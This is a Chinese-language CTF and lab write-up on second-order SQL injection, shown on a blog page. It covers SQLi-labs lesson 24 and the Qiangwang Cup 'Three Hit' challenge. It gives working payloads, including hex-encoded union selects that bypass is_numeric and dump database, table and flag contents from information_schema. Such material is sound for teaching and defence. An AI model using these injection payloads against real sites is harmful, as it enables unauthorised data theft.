mysql 二次注入,【干货总结】从实战看基础,由“强网杯”Three Hit聊聊二次注入...

原标题:【干货总结】从实战看基础,由“强网杯”Three Hit聊聊二次注入

之前参加“强网杯”,学到了不少姿势,其中的web题three hit印象深刻,考的是二次注入的问题,这里对二次注入尝试做一个小结。

什么是二次注入?

所谓二次注入是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。

二次注入是sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。

二次注入的原理

二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。

在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。

8a9468fc2e89a83c18b2dd2d7f15ffe0.png

二次注入的实例——SQLIlab lesson-24

学习SQL注入,必定要刷SQLIlab,这里以SQLIlab lesson-24为例,也是考察的二次注入的点。打开题目

17b055a32566504572f860d995f0ce35.png

这题正常的流程是首先注册一个账号,然后登陆进去会让你修改新的密码:

d3f091ee2f70ac9ae7bb6f8c456937fe.png

如果直接尝试在登陆处尝试SQL注入,payload: admin’# 发现失败:

bcd840e6e1ee5eecd89c081d7b9c3535.png

看一下源代码:

1e1e166a9a5aafdc91e730372d459964.png

登陆处的username和password都经过了mysql_real_escape_string函数的转义,直接执行SQL语句会转义’,所以该处无法造成SQL注入。

Ok,此时我们注册一个test’#的账号:

4cc6dd1a077b3d03801c5f2969a4fe20.png

注册用户的时候用了mysql_escape_string过滤参数:

319b7d2b1a3ca759bf76ebf077a1fbad.png

但是数据库中还是插入了问题数据test’#

0d00f44f581343babc2f4e99e3ecdf4b.png

也就是说经过mysql_escape_string转义的数据存入数据库后被还原,这里做了一个测试:

77165b3e2dbf8cacc8f4cfa643770c83.png

回到题目,此时,test用户的原来密码为test,我们以test’#用户登陆,再进行密码修改

28731788ee42d35dd941c070085ea849.png

我们无需填写current password即可修改test用户的密码:

665588fcaf2325dbd2bdf7b7f2596b33.png

我们再看一下test用户的密码:

43b9593e2ce0c1a325c8721c0ee23617.png

Ok,我们看一下源代码:

577965d6437bd3b002cbcaa005ae9d3e.png

Username直接从数据库中取出,没有经过转义处理。在更新用户密码的时候其实执行了下面的命令:

“UPDATEusers SET PASSWORD=’22′ where username=’test’#‘ and password=’$curr_pass’”;

因为我们将问题数据存储到了数据库,而程序再取数据库中的数据的时候没有进行二次判断便直接带入到代码中,从而造成了二次注入;

二次注入实例——“强网杯”three hit

题目描述:

aa7cb85ec7ec53eb329bf1a8651ea8ac.png

打开看看:

727454b57c44eb9cd379585f506d3f70.png

尝试注入失败

16d9ec7caaf61dfc86bdf46fc529c2b2.png

注册一个账号:

b71d83b505e42f70db28af637f3581bf.png

登陆进去会显示用户名,age,以及和该用户age相同的用户名。这里题目对用户名做了限制只能为0-9a-zA-Z,对age限制为只能是数字。

根据题目的显示,猜测SQL语句

Select name from table whereage=xx limit 0,1;

猜测age处存在SQL注入, 这里后来看了其他大佬的解题思路,某大佬直接访问.index.php.swp,获得了源代码(其实是比赛方在修改代码,非预期):

8431a46bcbea46e33e316b4354e02f0c.png

可以看到对age进行了is_numeric处理,可以用16进制编码绕过。

Payload:

1 and 1=2#

0x3120616e6420313d3223

用0x3120616e6420313d3223作为age注册一个用户:

c05e67f020bcfc21b8a8c618ffab42f4.png

发现查询为空。

再试试

1 and 1=1#

0x3120616e6420313d3123

用0x3120616e6420313d3123作为age注册一个用户:

f55e8f103be4f855771e861a2e2e613c.png

此时发现可以查询到aaa用户,根据and 1=1 和 and 1=2返回不同判断此处存在二次SQL注入,注册用户的age字段直接被后续的查询语句所调用。接下来的操作和普通的SQL注入测试操作没有什么区别,首先还是测有几列:

Payload:

1 order by4#

注册age为0x31206f72646572206279203423的用户:

ee1bef3483c2b02ee33b0c3d7067cb34.png

查询正常。

Payload:

【此处内容缺失】

注册age为0x31206f72646572206279203523的用户:

adfafbfad0aea0ddc552f43efb2710bb.png

查询失败,可以判断列数为4,接下来就是暴库,首先用union看看可以利用显示的字段:

314c6d2c9617a1da3e19cac5356c0206.png

可以看到第二列可以用来显示,接下来暴库:

Payload:

1 and 1=2union select 1,group_concat(schema_name),3,4 from information_schema.schemata#

0x3120616e6420313d3220756e696f6e2073656c65637420312c67726f75705f636f6e63617428736368656d615f6e616d65292c332c342066726f6d20696e666f726d6174696f6e5f736368656d612e736368656d61746123

4b591dee8d101efde2e225c8c144717a.png

可以看到 数据库名qwb,接下来爆表:

Payload:

1 and 1=2union select 1,group_concat(table_name),3,4 from information_schema.tableswhere table_schema='qwb'#

0x3120616e6420313d3220756e696f6e2073656c65637420312c67726f75705f636f6e636174287461626c655f6e616d65292c332c342066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d277177622723

72abfacf5f03540599d86c42e1a500db.png

最终payload:

19 and 1=2union select null,concat(flag),null,null from flag#

0x313920616e6420313d3220756e696f6e2073656c656374206e756c6c2c636f6e63617428666c6167292c6e756c6c2c6e756c6c2066726f6d20666c616723

注册一个age为0x313920616e6420313d3220756e696f6e2073656c656374206e756c6c2c636f6e63617428666c6167292c6e756c6c2c6e756c6c2066726f6d20666c616723的用户:

dd9644fa77960cb8221ad287dfbaf1b8.png

总结一下,二次注入发生时,虽然会对用户的输入的一些符号进行转义,但是在存入数据库的时候被还原,如果从数据库中取数据的时候直接进行利用,就会造成二次注入,因此在从数据库或文件中取数据的时候,也要进行转义或者过滤。

文:SAINTSEC团队tinyfisher

来源:FreeBuf

号外号外

此前参与开源聚合“疯狂挠红包”活动的获奖者,你们的哈士奇毛绒公仔正在奔赴你们的怀抱,记得签收哦!

cf361bcf4c04841fa14cf642b151eb6f.png

ba70993083cc5d8715f4d5e35266a1b8.png

9c4177011ab3c66b000b2af6d076ee1b.png

后续仍会有更多精彩的活动,敬请期待!

责任编辑:

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值